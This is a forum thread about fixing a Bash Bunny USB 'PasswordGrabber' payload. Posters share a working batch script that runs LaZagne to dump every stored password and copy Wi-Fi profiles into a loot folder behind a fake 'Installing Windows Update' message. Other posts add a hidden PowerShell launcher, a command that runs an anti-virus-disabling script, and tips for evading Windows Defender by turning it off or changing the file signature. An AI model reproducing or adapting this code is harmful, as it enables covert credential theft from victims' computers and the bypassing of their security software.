Jump to content
Cech

PasswordGrabber by LazaGne Not Working

Recommended Posts

Hey guys, I've recently bought Bash Bunny and I've tried to  set PasswordGrabber on Switch2, I've copied all the files (d.exe, e.exe, i.vbs, lazagne.exe, lazagne.py, payload.txt and readme.md), once I switch it from arming mode to switch2 (attack mode) and I place it into a victim's PC (test pc) on windows 10, the green LED starts to flash within few seconds (which probably means to remove it right?)

 

Once I remove it and switch it back to arming mode on my PC, I get empty directories and empty notepad files. Can anyone please tell me if I'm doing something wrong? 

 

Thank you in advance guys

Share this post


Link to post
Share on other sites

Maybe an VirusScanner lazagne.exe was mostly catched by AV.

Share this post


Link to post
Share on other sites

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration.  I also attached the version of it I created and which works, tested on latest windows 10.  If the Virus scanner blocked Lazagna, then the directory would be created.   Notice the formatting of drec, then the use of dst instead of drec.  Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration  I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Share this post


Link to post
Share on other sites

Nice edits, I also made a few small changes myself. I edited i.vbs to call the .cmd file directly...seems to have no bugs in my testing. 

i.vbs

Set objShell = CreateObject("WScript.Shell")



strPath = Wscript.ScriptFullName


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile(strPath)
strFolder = "powershell -nologo -WindowStyle Hidden -ExecutionPolicy unrestriced " & objFSO.GetParentFolderName(objFile) & "\e.cmd"




objShell.Run strFolder


 

and then just remove %~dp0\e.cmd from d.cmd

Share this post


Link to post
Share on other sites

isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe

Share this post


Link to post
Share on other sites
14 hours ago, Am3ience said:

isn't there also a problem with the Passwordgrabber payload wanting the Lazagne.exe in the tools folder. But everytime you re-arm the bunny it deletes the .exe

You could paste a little piece of code before that that disables the av:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

  • Like 1

Share this post


Link to post
Share on other sites
1 hour ago, C1PH3R said:

You could paste a little piece of code before that that disables the av:

RUN WIN Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\disable-anti-virus.ps1')"

That was the code and then you need this file:

https://github.com/CIPH3R0/BashBunny/blob/master/USB-PWNR/disable-anti-virus.ps1

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Share this post


Link to post
Share on other sites
21 hours ago, Am3ience said:

I had AV disabled on my computer that was re-arming the bunny, and the .exe still disappeared.

Huh, that is strange.

Share this post


Link to post
Share on other sites
On 2018-02-22 at 11:35 AM, RazerBlade said:

Windows defender removes it.

 

Yea, windows defender needs to be turned off, I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible

Share this post


Link to post
Share on other sites
12 hours ago, Spoonman said:

 

Yea, windows defender needs to be turned off, I just started playing around with this, maybe I can find something to auto-turn it off if that's even possible

A better would be to compile the code yourself and add a couple of comments to change the file signature.

Share this post


Link to post
Share on other sites

I have been playing with Python for hours trying to figure out how to compile this.  It can't be that complicated.  I got 2.7, used pip to install all the dependencies and tried cx_freeze and I get errors.  Is there an ealier version of Pythin or somewhere that gives compile instructions?

Share this post


Link to post
Share on other sites

I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

  • Like 1

Share this post


Link to post
Share on other sites
2 hours ago, DennisVeninga said:

I've modified this payload for disabling Windows Defender (only) and activating again after finishing.

https://github.com/DennisVeninga/BashBunny-Projects/tree/master/PasswordGrabber-v2

I have done that you say and it doesn't work for. Why? I am new at this, help

Share this post


Link to post
Share on other sites
On 11/25/2017 at 5:50 PM, Struthian said:

The problem I found with the current version of e.cmd is that it does not create a legit file name for the directory. There are also inconsistencies in the use of the base directory.

Here is the one I edited so that it works for illustration.  I also attached the version of it I created and which works, tested on latest windows 10.  If the Virus scanner blocked Lazagna, then the directory would be created.   Notice the formatting of drec, then the use of dst instead of drec.  Also notice the inconsistent use of loot/passwordgrabber and loot/usbexfiltration  I am continuing to investigate and improve this payload.

Following is for illustration, actual e.cmd is attached.

@echo off
@echo Installing Windows Update

setlocal
cd /d %~dp0

REM Time and Date
set drec=%COMPUTERNAME%_%date%_%TIME: =0%
REM make drec a legit filename.
set drec=%drec: =_%
set drec=%drec::=%
set drec=%drec:/=_%
set drec=%drec:.=_%
set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
mkdir %dst% >>nul

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM %~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"
%~dp0\laZagne.exe all -v > "%dst%\passwords.txt"

if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo  -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit
 

e.cmd

Hello you ahve function USB_Exfiltration and PasswordGrabber ? could you share the files please?


 

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...